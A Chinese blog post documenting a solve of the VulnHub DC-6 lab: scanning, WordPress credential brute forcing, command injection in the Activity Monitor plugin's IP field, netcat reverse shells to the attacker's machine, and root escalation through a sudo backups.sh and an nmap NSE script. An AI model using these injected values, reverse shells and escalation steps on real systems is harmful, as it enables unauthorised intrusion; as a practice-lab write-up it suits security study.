<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="author" content="John Doe">
    
    
    
    
    
    
    <title>DC6-Try | Hexo</title>
    <!-- inject:style -->
    <link href="/css/style.css" rel="stylesheet" type="text/css">
    <!-- endinject -->
    <style>
        .cube-loading {
            top: 0;
            position: fixed;
            width: 100%;
            height: 100%;
            background: url('/images/lg/loading.gif') no-repeat center center;
            background-color: rgba(0,0,0,.7);
        }

        .cube-loading.out {
            display: none;
        }

        .cube-loading:before {
            display: block;
            content: 'Loading';
            position: relative;
            width: 100%;
            top: 50%;
            right: -50%;
            color: #fff;
        }

        @media(max-width: 768px) {
            .cube-loading:before {
                font-size: 1.2em;
                transform: translate(-24px,20px);
                -webkit-transform: translate(-24px,20px);
                -o-transform: translate(-24px,20px);
                -ms-transform: translate(-24px,20px);
            }
        }

        @media(min-width: 768px) {
            .cube-loading:before {

            }
        }
    </style>
    
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
<div class="cube-body">
    <nav id="cube-top-memu" class="cube-menu">
    <ul class="cube-menu-collapse">
        
        <li>
            <i class="cube-icon cube-icon-home" aria-hidden="true"></i>
            <a href="/">首页</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-archive" aria-hidden="true"></i>
            <a href="/archives">归档</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-categories" aria-hidden="true"></i>
            <a href="/categories">分类</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-tags" aria-hidden="true"></i>
            <a href="/tags">标签</a>
        </li>
        
        <li>
            <i class="cube-icon cube-icon-about" aria-hidden="true"></i>
            <a href="/about-me">关于我</a>
        </li>
        
    </ul>
</nav>
<nav class="cube-side-menu" id="cube-side-menu">
    <ul class="cube-menu-list">
        
        <li>
            <a class="lrc-control">Open Lyrics</a>
        </li>
        
        <li>
            <a class="scroll-to-top">Top</a>
        </li>
    </ul>
</nav>
    <header class="cube-header" id="cube-header">
    <img src=" https://api.r10086.com/%E5%9B%BE%E5%8C%85webp/%E6%B5%B7%E8%B4%BC%E7%8E%8B%E6%A8%AA%E5%B1%8F%E7%B3%BB%E5%88%971/wallhaven-0q6vml.webp " alt="头部背景图片">
    
    <div class="cube-type">
        <span class="cube-typed-title">zyzhuv的私人博客</span>
        <span class="cube-typed-cursor">|</span>
    </div>
    
</header>

    <style>
        nav.cube-menu:before {
            content: '';
            visibility: hidden;
            position: absolute;
            left: 0;
            top: 0;
            width: 100%;
            height: 44px;
        
            filter: blur(1px);
            -webkit-filter: blur(1px);
        
            z-index: -1;
            background-image: url('https://api.r10086.com/%E5%9B%BE%E5%8C%85webp/%E6%B5%B7%E8%B4%BC%E7%8E%8B%E6%A8%AA%E5%B1%8F%E7%B3%BB%E5%88%971/wallhaven-0q6vml.webp');
            background-repeat: no-repeat;
            background-position: center -256px;
            background-size: cover;
            background-color: transparent;
        }

        header.cube-background.cube-header-background {
            visibility: hidden;
            background-image: url('https://api.r10086.com/%E5%9B%BE%E5%8C%85webp/%E6%B5%B7%E8%B4%BC%E7%8E%8B%E6%A8%AA%E5%B1%8F%E7%B3%BB%E5%88%971/wallhaven-0q6vml.webp');
            background-position: center -300px;
        }
    </style>
    <header class="cube-background cube-header-background">
        
        <div class="cube-type">
            <span class="cube-typed-title">zyzhuv的私人博客</span>
            <span class="cube-typed-cursor">|</span>
        </div>
        
    </header>
    <div class="load-header-background"></div>
    <script>
        (function (window) {

            window.headerModule = {}
            window.headerModule.image = {
                width: '2000',
                height: '1314'
            }

        })(window)
    </script>
    
    <div class="cube-content">
        <div class="cube-left">
            <div class="cube-article">
    <h1 class="title">DC6-Try</h1>
        
            <div class="cube-article-header">
                <div class="cube-article-date">
                    <i class="cube-icon cube-icon-date" aria-hidden="true"></i>
                    <!-- moment.js对象 -->
                    2024-07-29
                </div>
                <div class="cube-article-tags">
    <i class="cube-icon cube-icon-tag" aria-hidden="true"></i>
    
</div>
            </div>
            
                    <div class="cube-article-content cube-markdown">
                        
                            <h1 id="1信息收集"><a href="#1信息收集" class="headerlink" title="1信息收集"></a>1信息收集</h1><p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/dc-6,315/">https://www.vulnhub.com/entry/dc-6,315/</a></p>
<p>(1)看ip</p>
<p>先 </p>
<span id="more"></span>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nmap -sP 192.168.49.0/24</span><br><span class="line">arp-scan -l</span><br></pre></td></tr></table></figure>

<p>这个两个好像是扫的是同网段的</p>
<p>看到135</p>
<p>netdiscover  这个扫所有的的ip</p>
<p>（2）扫端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sS -sV -A -n 192.168.49.135</span><br></pre></td></tr></table></figure>

<p>看到 22，80</p>
<p>访问不行，被重定向，hosts改一下就行</p>
<p>可以了</p>
<p>用插件看到wordpress框架</p>
<p><img src="/2024/07/29/DC6-Try/1.png" alt="DC6-Try"></p>
<p>用他的专属工具</p>
<p>在此之前扫个目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirb http://wordy/     </span><br></pre></td></tr></table></figure>

<p>有admin.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cewl http://wordy/ -w pa.txt   </span><br></pre></td></tr></table></figure>

<p>找到密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url  http://wordy -e u      </span><br></pre></td></tr></table></figure>

<p>找到user，5个用户名</p>
<p><img src="/2024/07/29/DC6-Try/2.png" alt="DC6-Try"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;admin&quot; &gt;&gt; &#x27;us.txt&#x27;</span><br><span class="line">echo &quot;mark&quot; &gt;&gt; &#x27;us.txt&#x27;</span><br><span class="line">echo &quot;jens&quot; &gt;&gt; &#x27;us.txt&#x27;</span><br><span class="line">echo &quot;graham&quot; &gt;&gt; &#x27;us.txt&#x27;</span><br><span class="line">echo &quot;sarah&quot; &gt;&gt; &#x27;us.txt&#x27;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url  http://wordy  -U us.txt -P pa.txt</span><br></pre></td></tr></table></figure>

<p>发现爆不出来</p>
<p>这个时候你下载镜像的时候有一个线索</p>
<p>OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.</p>
<p>好吧，这并不是一个真正的线索，但更多的是“我们不想花五年时间等待某个过程完成”的建议，对于那些只想继续工作的人来说。</p>
<p>cat &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt | grep k01 &gt; passwords.txt That should save you a few years. ;-)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">cd /usr/share/wordlists</span><br><span class="line">ls</span><br><span class="line">看到rockyou.txt.gz</span><br><span class="line">gunzip rockyou.txt.gz</span><br><span class="line">cat /usr/share/wordlists/rockyou.txt | grep k01 &gt; passwords.txt</span><br><span class="line">搜索rockyou.txt包含k01字符的写入一个文本</span><br><span class="line">grep是 搜索的意思</span><br><span class="line">wpscan --url http://wordy -U us.txt -P passwords.txt</span><br></pre></td></tr></table></figure>

<p>爆出来   Username: mark, Password: helpdesk01 </p>
<p>登录</p>
<p>activity_monitor 这个插件有一个漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit activity monitor</span><br></pre></td></tr></table></figure>

<p>看到历史漏洞</p>
<p>尝试 html没反弹成功</p>
<p>用哪个py代码，是一个远程登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cp  /usr/share/exploitdb/exploits/php/webapps/50110.py  ./      </span><br></pre></td></tr></table></figure>

<p>cat 一下</p>
<p><img src="/2024/07/29/DC6-Try/3.png" alt="DC6-Try"></p>
<p>把爆出来的账号密码试了一下</p>
<p>ip为dc机ip</p>
<p>但是运行py文件 让你手动输入账号密码ip</p>
<p>运行可以得到shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">再 nc -e /bin/bash 192.168.49.129 9999</span><br></pre></td></tr></table></figure>

<p>kali  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvnp 9999</span><br><span class="line">python  -c &#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br><span class="line">进入交互模式</span><br><span class="line"> find / -user root -perm -4000 2&gt;/dev/null</span><br><span class="line"> 看到没啥sudo也没法直接利用</span><br><span class="line"> 一般的suid提权 nmap，vim，find，bash，more，less，nano，cp</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">cd /home</span><br><span class="line">ls</span><br><span class="line">有四个用户</span><br><span class="line">ls -al  user</span><br><span class="line">看到  jens  有一个 backups.sh</span><br><span class="line">看到mark 有一个 stuff</span><br><span class="line">cat 一下backups.sh没权限</span><br><span class="line">看一下 stuff</span><br><span class="line">有一个txt文件</span><br><span class="line">看到 Add new user: graham - GSo7isUM1D4 - done</span><br><span class="line">知道了 一个账号密码</span><br><span class="line">su graham  输入密码</span><br><span class="line">sudo -l  看一下可执行命令</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/2024/07/29/DC6-Try/4.png" alt="DC6-Try"></p>
<p> (jens) NOPASSWD: &#x2F;home&#x2F;jens&#x2F;backups.sh</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cd /home/jens</span><br><span class="line">echo &quot;/bin/bash&quot; &gt;&gt; backups.sh</span><br><span class="line">sudo -u jens ./backups.sh</span><br><span class="line">切换到jens</span><br><span class="line">sudo -l</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/2024/07/29/DC6-Try/5.png" alt="DC6-Try"></p>
<p>  (root) NOPASSWD: &#x2F;usr&#x2F;bin&#x2F;nmap</p>
<p>看到nmap</p>
<p>–script: 指定自己的脚本文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;os.execute(&quot;/bin/bash&quot;)&#x27; &gt; shell.nse</span><br><span class="line">创建以恶搞shell.nse文件</span><br><span class="line">sudo -u root nmap --script=shell.nse   以root用户执行namp</span><br><span class="line">获得root</span><br><span class="line">cd /root</span><br><span class="line">cat theflag*</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/2024/07/29/DC6-Try/6.png" alt="DC6-Try"></p>
<p>#!&#x2F;bin&#x2F;bash  用&#x2F;bin&#x2F;bash这个脚本来执行任务</p>
<p>grep 搜索</p>
<p>html获得shell没成</p>
<p>但还有一个获取shell的机会</p>
<p><img src="/2024/07/29/DC6-Try/7.png" alt="DC6-Try"></p>
<p>activity momitor的tools 这里有一个</p>
<p>提交ip的地方</p>
<p>bp抓包</p>
<p><img src="/2024/07/29/DC6-Try/8.png" alt="DC6-Try"></p>
<p>ip这个地方|加命令可以执行 souhu.com|whoami</p>
<p><img src="/2024/07/29/DC6-Try/9.png" alt="DC6-Try"></p>
<p>souhu.com|nc -e &#x2F;bin&#x2F;bash 192.168.49.129 6666</p>
<p>kali nc一下就可shell</p>
<p><img src="/2024/07/29/DC6-Try/10.png" alt="DC6-Try"></p>
<p>得到shell后反弹shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">nc -e /bin/bash 192.168.49.129 6666</span><br><span class="line">nc -e /bin/sh 192.168.49.129 6666</span><br><span class="line">这两个都可以</span><br><span class="line"></span><br></pre></td></tr></table></figure>


                    </div>
</div>

    <div class="cube-article-nav">
        <ul>
            
                <li class="prev">
                    <a href="/2024/07/29/DC7-Try/">
                        <i class="cube-icon cube-prev" aria-hidden="true"></i>
                        DC7-Try
                    </a>
                </li>
                
                    
                        <li class="next">
                            <a href="/2024/07/28/DC5-Try/">
                                DC5-Try
                                    <i class="cube-icon cube-next" aria-hidden="true"></i>
                            </a>
                        </li>
                        
        </ul>
    </div>
    
        
            <!-- TODO 根据theme.comment的内容进行入口选择 -->

                
        </div>
        <div class="cube-right">
            

<div class="cube-search cube-sidebar" id="cube-search">
    <div class="search-container">
        <input type="text" placeholder="Search" class="cube-search-input" id="cube-search-input">
        <i class="cube-icon cube-icon-search cube-search-submit" aria-hidden="true"></i>
    </div>
    <!-- TODO 通过给window赋一个全局变量，通过脚本赋值 -->
</div>
<script>
    (function (window) {
        'use strict';
        window.searchModule = {}
        window.searchModule.JSONUrl = '/content.json'
        window.searchModule.rootUrl = '/'
    })(window)
</script>
<div class="cube-search-form">
    <div class="cube-search-control">
        <input type="text" placeholder="Search" class="search-input">
        <a class="close-button">
            <i class="cube-icon cube-close" aria-hidden="true"></i>
        </a>
    </div>
    <div class="cube-search-result"></div>
</div>


<div class="cube-author cube-sidebar" id="cube-author">
    
    
    <span>John Doe</span>
    
    
    <div class="count">
        <a class="count articles"><span>23</span>Article</a>
        <a class="count tags"><span>0</span>Tags</a>
        <a class="count categories"><span>0</span>Categories</a>
    </div>
</div>



<div class="cube-music cube-sidebar" id="cube-music">
    <div class="cube-player aplayer" id="cube-player"></div>
</div>
<script>
    (function (window) {
        window.musicModule = {}
        window.musicModule.musicConfig = '{"narrow":false,"autoplay":false,"showlrc":3,"theme":"#b7daff","mutex":true,"mode":"circulation","preload":"auto","listmaxheight":"513px","music":[{"title":"Dear friends","author":"TRIPLANE","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/TRIPLANE - Dear friends.mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/Dear friends - TRIPLANE.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/TRIPLANE - Dear friends.jpg"},{"title":"Butter-Fly","author":"和田光司","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/和田光司 - Butter-Fly (ピアノヴァージョン).mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/Butter-Fly (ピアノヴァージョン) - 和田光司.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/和田光司 - Butter-Fly (ピアノヴァージョン).jpg"},{"title":"宵闇花火","author":"葉月ゆら","url":"http://cube-1252774894.cosgz.myqcloud.com/music/source/葉月ゆら - 宵闇花火.mp3","lrc":"http://cube-1252774894.cosgz.myqcloud.com/music/lrc/宵闇花火 - 葉月ゆら.lrc","pic":"http://cube-1252774894.cosgz.myqcloud.com/music/image/葉月ゆら - 宵闇花火.jpg"}]}'
        window.musicModule.lrcConfig = {
            open: 'Open Lyrics',
            close: 'Close Lyrics'
        }
    })(window)
</script>



<div class="cube-recent-posts cube-sidebar" id="cube-recent-posts">
    <div class="title">
        <a>Recent Posts</a>
    </div>
    <ul class="list">
        
        
        <li>
            <!-- TODO 如果文章要显示图片，那么在front-matter上添加preview属性(url or path) -->
            
            <div class="normal">
                <p class="index first">
                    <span>1</span>
                </p>
                <p class="title">
                    <a href="/2024/11/21/URLDNS/" title=""></a>
                </p>
            </div>
            
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>2</span>
                </p>
                <p class="title">
                    <a href="/2024/09/19/hongri02/" title="hongri02">hongri02</a>
                </p>
            </div>
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>3</span>
                </p>
                <p class="title">
                    <a href="/2024/08/20/hongri01/" title="hongri01">hongri01</a>
                </p>
            </div>
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>4</span>
                </p>
                <p class="title">
                    <a href="/2024/08/03/cont/" title="cont">cont</a>
                </p>
            </div>
        </li>
        
        
        
        <li>
            <div class="normal">
                <p class="index">
                    <span>5</span>
                </p>
                <p class="title">
                    <a href="/2024/08/01/MyFileServer/" title="MyFileServer">MyFileServer</a>
                </p>
            </div>
        </li>
        
        
    </ul>
</div>







<div class="cube-links cube-sidebar" id="cube-links">
    <div class="title">
        <a>Links</a>
    </div>
    <ul class="list">
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/GitHub.png">
            
            <a href="https://github.com/ZEROKISEKI" target="_blank">GitHub</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/Coding.png">
            
            <a href="https://coding.net/u/SORA1" target="_blank">Coding</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/SF.png">
            
            <a href="https://segmentfault.com/u/aonosora" target="_blank">SF社区</a>
        </li>
        
        <li>
            
            
            <img src="http://cube-1252774894.cosgz.myqcloud.com/links/开发者头条.png">
            
            <a href="https://toutiao.io/u/148070" target="_blank">开发者头条</a>
        </li>
        
    </ul>
</div>



<div class="cube-friend-links cube-sidebar" id="cube-friend-links">
    <div class="title">
        <a>Friend Links</a>
    </div>
    <ul class="list">
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="http://cube-1252774894.cosgz.myqcloud.com/friend_links/micblo.png">
            <a href="https://blog.micblo.com/" target="_blank">罗大佬</a>
        </li>
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="http://cube-1252774894.cosgz.myqcloud.com/friend_links/DIYgod.jpg">
            <a href="https://www.anotherhome.net/" target="_blank">DIYgod</a>
        </li>
        
        <li>
            <!-- TODO change avatar.png to friend.png-->
            <img src="/images/friend_links.jpg ">
            <a href="https://aonosora.com/" target="_blank">咪西西の部落格</a>
        </li>
        
    </ul>
</div>


        </div>
    </div>
</div>
<footer class="cube-footer">
    
© 2017 John Doe

<br>
Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>.&nbsp;Theme by <a href="https://github.com/ZEROKISEKI" target="_blank">AONOSORA</a>
</footer>
<!-- inject:script -->
<script src="/js/script.js"></script>
<!-- endinject -->
<div class="cube-loading out"></div>
</body>
</html>